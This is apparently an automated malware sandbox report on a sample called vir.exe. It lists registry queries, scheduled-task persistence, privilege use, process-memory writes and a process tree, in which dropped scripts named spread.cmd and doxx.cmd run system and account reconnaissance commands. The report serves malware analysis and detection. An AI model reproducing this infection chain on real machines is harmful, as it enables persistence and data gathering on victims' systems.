Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3564 wmic.exe -
Enumerates system info in registry 2 TTPs 16 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 3304 ipconfig.exe -
Kills process with taskkill 5 IoCs
pid Process 2856 taskkill.exe 6260 taskkill.exe 6296 taskkill.exe 6756 taskkill.exe 6748 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10 reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\36 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\39\IEPropFontName = "Mongolian Baiti" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\35\IEFixedFontName = "Estrangelo Edessa" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37\IEFixedFontName = "Leelawadee UI" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11\IEFixedFontName = "Shonar Bangla" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13\IEFixedFontName = "Shruti" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28\IEFixedFontName = "Gadugi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30\IEPropFontName = "Microsoft Yi Baiti" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24\IEFixedFontName = "MS Gothic" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\32\IEFixedFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10\IEFixedFontName = "Kokila" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28\IEPropFontName = "Gadugi" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38\IEPropFontName = "MV Boli" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12\IEFixedFontName = "Raavi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34\IEFixedFontName = "Iskoola Pota" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25\IEPropFontName = "PMingLiu" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8\IEFixedFontName = "Courier New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27\IEPropFontName = "Ebrima" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28 reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5\IEFixedFontName = "Courier New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13\IEPropFontName = "Shruti" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\23\IEFixedFontName = "GulimChe" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26\IEPropFontName = "Simsun" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\36\IEFixedFontName = "Myanmar Text" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12\IEPropFontName = "Raavi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20\IEFixedFontName = "Leelawadee UI" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37\IEPropFontName = "Leelawadee UI" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11\IEPropFontName = "Shonar Bangla" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14\IEFixedFontName = "Kalinga" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\18\IEFixedFontName = "Kartika" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName = "Courier New" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38\IEFixedFontName = "MV Boli" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6\IEFixedFontName = "Courier New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16\IEPropFontName = "Vani" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16\IEFixedFontName = "Vani" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34\IEPropFontName = "Iskoola Pota" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29\IEPropFontName = "Gadugi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30\IEFixedFontName = "Microsoft Yi Baiti" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33\IEFixedFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19\IEPropFontName = "Leelawadee UI" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25 reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10\IEPropFontName = "Kokila" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\18\IEPropFontName = "Kartika" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\35 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14\IEPropFontName = "Kalinga" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27\IEFixedFontName = "Ebrima" reg.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\psiphon\shell\open 3.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\psiphon 3.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\psiphon\ = "URL:psiphon" 3.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\psiphon\URL Protocol 3.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\psiphon\shell\open\command 3.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\psiphon\shell 3.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\\bloatware\\3.exe\" -- \"%1\"" 3.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings cmd.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 19 IoCs
pid Process 6096 PING.EXE 9148 PING.EXE 5144 PING.EXE 8832 PING.EXE 8380 PING.EXE 9032 PING.EXE 3760 PING.EXE 5460 PING.EXE 6352 PING.EXE 8092 PING.EXE 640 PING.EXE 6200 PING.EXE 7024 PING.EXE 4776 PING.EXE 456 PING.EXE 1708 PING.EXE 6212 PING.EXE 6412 PING.EXE 1772 PING.EXE -
Runs regedit.exe 1 IoCs
pid Process 8456 regedit.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7460 schtasks.exe 7184 schtasks.exe 6480 schtasks.exe 4072 schtasks.exe 6560 schtasks.exe 7036 schtasks.exe 4016 schtasks.exe 8388 schtasks.exe 6940 schtasks.exe 5644 schtasks.exe 6580 schtasks.exe 5672 schtasks.exe 6768 schtasks.exe 6292 schtasks.exe 5876 schtasks.exe 4124 schtasks.exe 8752 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 1000 tasklist.exe 1000 tasklist.exe 1768 msedge.exe 1768 msedge.exe 2316 msedge.exe 2316 msedge.exe 5796 msedge.exe 5796 msedge.exe 1076 identity_helper.exe 1076 identity_helper.exe 5440 WinaeroTweaker-1.40.0.0-setup.tmp 5440 WinaeroTweaker-1.40.0.0-setup.tmp 436 powershell.exe 436 powershell.exe 436 powershell.exe 7104 chrome.exe 7104 chrome.exe 436 powershell.exe 436 powershell.exe 436 powershell.exe 436 powershell.exe 436 powershell.exe 436 powershell.exe 436 powershell.exe 7468 powershell.exe 7468 powershell.exe 7468 powershell.exe 5776 6eoK9cmGaTaMPDXJDZ5cDxGS.exe 5776 6eoK9cmGaTaMPDXJDZ5cDxGS.exe 7736 lx26s09UlZjAOugX3CvKdnQ3.exe 7736 lx26s09UlZjAOugX3CvKdnQ3.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 6196 ac3.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1000 tasklist.exe Token: SeDebugPrivilege 2856 taskkill.exe Token: SeDebugPrivilege 2748 Rover.exe Token: SeDebugPrivilege 6260 taskkill.exe Token: SeDebugPrivilege 6296 taskkill.exe Token: SeDebugPrivilege 6756 taskkill.exe Token: SeDebugPrivilege 6724 scary.exe Token: SeDebugPrivilege 7000 Romilyaa.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 6508 Romilyaa.exe Token: SeDebugPrivilege 3028 firefox.exe Token: SeDebugPrivilege 3028 firefox.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeDebugPrivilege 7468 powershell.exe Token: SeDebugPrivilege 7512 jsc.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeDebugPrivilege 7832 Romilyaa.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeDebugPrivilege 6628 Romilyaa.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe Token: SeShutdownPrivilege 7104 chrome.exe Token: SeCreatePagefilePrivilege 7104 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 5692 efsui.exe 5692 efsui.exe 5692 efsui.exe 5440 WinaeroTweaker-1.40.0.0-setup.tmp 7000 Romilyaa.exe 6508 Romilyaa.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 2316 msedge.exe 5692 efsui.exe 5692 efsui.exe 5692 efsui.exe 7000 Romilyaa.exe 6508 Romilyaa.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 3028 firefox.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe 7104 chrome.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4588 3.exe 4588 3.exe 3028 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2192 wrote to memory of 1568 2192 vir.exe 89 PID 2192 wrote to memory of 1568 2192 vir.exe 89 PID 2192 wrote to memory of 1568 2192 vir.exe 89 PID 2192 wrote to memory of 1188 2192 vir.exe 91 PID 2192 wrote to memory of 1188 2192 vir.exe 91 PID 2192 wrote to memory of 1188 2192 vir.exe 91 PID 1188 wrote to memory of 4224 1188 cmd.exe 93 PID 1188 wrote to memory of 4224 1188 cmd.exe 93 PID 1188 wrote to memory of 4224 1188 cmd.exe 93 PID 1188 wrote to memory of 1960 1188 cmd.exe 94 PID 1188 wrote to memory of 1960 1188 cmd.exe 94 PID 1188 wrote to memory of 1960 1188 cmd.exe 94 PID 1188 wrote to memory of 640 1188 cmd.exe 97 PID 1188 wrote to memory of 640 1188 cmd.exe 97 PID 1188 wrote to memory of 640 1188 cmd.exe 97 PID 1960 wrote to memory of 3304 1960 cmd.exe 98 PID 1960 wrote to memory of 3304 1960 cmd.exe 98 PID 1960 wrote to memory of 3304 1960 cmd.exe 98 PID 4224 wrote to memory of 3044 4224 cmd.exe 99 PID 4224 wrote to memory of 3044 4224 cmd.exe 99 PID 4224 wrote to memory of 3044 4224 cmd.exe 99 PID 1960 wrote to memory of 4544 1960 cmd.exe 100 PID 1960 wrote to memory of 4544 1960 cmd.exe 100 PID 1960 wrote to memory of 4544 1960 cmd.exe 100 PID 4544 wrote to memory of 3724 4544 net.exe 101 PID 4544 wrote to memory of 3724 4544 net.exe 101 PID 4544 wrote to memory of 3724 4544 net.exe 101 PID 4224 wrote to memory of 4440 4224 cmd.exe 102 PID 4224 wrote to memory of 4440 4224 cmd.exe 102 PID 4224 wrote to memory of 4440 4224 cmd.exe 102 PID 1960 wrote to memory of 1940 1960 cmd.exe 103 PID 1960 wrote to memory of 1940 1960 cmd.exe 103 PID 1960 wrote to memory of 1940 1960 cmd.exe 103 PID 1940 wrote to memory of 3732 1940 net.exe 104 PID 1940 wrote to memory of 3732 1940 net.exe 104 PID 1940 wrote to memory of 3732 1940 net.exe 104 PID 4224 wrote to memory of 1716 4224 cmd.exe 105 PID 4224 wrote to memory of 1716 4224 cmd.exe 105 PID 4224 wrote to memory of 1716 4224 cmd.exe 105 PID 1960 wrote to memory of 1000 1960 cmd.exe 106 PID 1960 wrote to memory of 1000 1960 cmd.exe 106 PID 1960 wrote to memory of 1000 1960 cmd.exe 106 PID 1188 wrote to memory of 2856 1188 cmd.exe 109 PID 1188 wrote to memory of 2856 1188 cmd.exe 109 PID 1188 wrote to memory of 2856 1188 cmd.exe 109 PID 1188 wrote to memory of 384 1188 cmd.exe 110 PID 1188 wrote to memory of 384 1188 cmd.exe 110 PID 1188 wrote to memory of 384 1188 cmd.exe 110 PID 1188 wrote to memory of 2316 1188 cmd.exe 112 PID 1188 wrote to memory of 2316 1188 cmd.exe 112 PID 1188 wrote to memory of 4784 1188 cmd.exe 113 PID 1188 wrote to memory of 4784 1188 cmd.exe 113 PID 1188 wrote to memory of 4784 1188 cmd.exe 113 PID 2316 wrote to memory of 3896 2316 msedge.exe 114 PID 2316 wrote to memory of 3896 2316 msedge.exe 114 PID 1188 wrote to memory of 2748 1188 cmd.exe 115 PID 1188 wrote to memory of 2748 1188 cmd.exe 115 PID 1188 wrote to memory of 2748 1188 cmd.exe 115 PID 1188 wrote to memory of 4012 1188 cmd.exe 117 PID 1188 wrote to memory of 4012 1188 cmd.exe 117 PID 4012 wrote to memory of 4612 4012 msedge.exe 119 PID 4012 wrote to memory of 4612 4012 msedge.exe 119 PID 2316 wrote to memory of 4268 2316 msedge.exe 122 PID 2316 wrote to memory of 4268 2316 msedge.exe 122 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5284 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\vir.exe"C:\Users\Admin\AppData\Local\Temp\vir.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Users\Admin\AppData\Local\Temp\e267a0a2-2082-40ab-bb32-812dc8ebdae1\ProgressBarSplash.exe"C:\Users\Admin\AppData\Local\Temp\e267a0a2-2082-40ab-bb32-812dc8ebdae1\ProgressBarSplash.exe" -unpacking2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\!main.cmd" "2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K spread.cmd3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Windows\SysWOW64\xcopy.exexcopy 1 C:\Users\Admin\Desktop4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3044
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 2 C:\Users\Admin\Desktop4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:4440
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 3 C:\Users\Admin\4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K doxx.cmd3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\SysWOW64\ipconfig.exeipconfig4⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:3304
-
-
C:\Windows\SysWOW64\net.exenet accounts4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts5⤵
- System Location Discovery: System Language Discovery
PID:3724
-
-
-
C:\Windows\SysWOW64\net.exenet user4⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user5⤵
- System Location Discovery: System Language Discovery
PID:3732
-
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /apps /v /fo table4⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1000
-
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
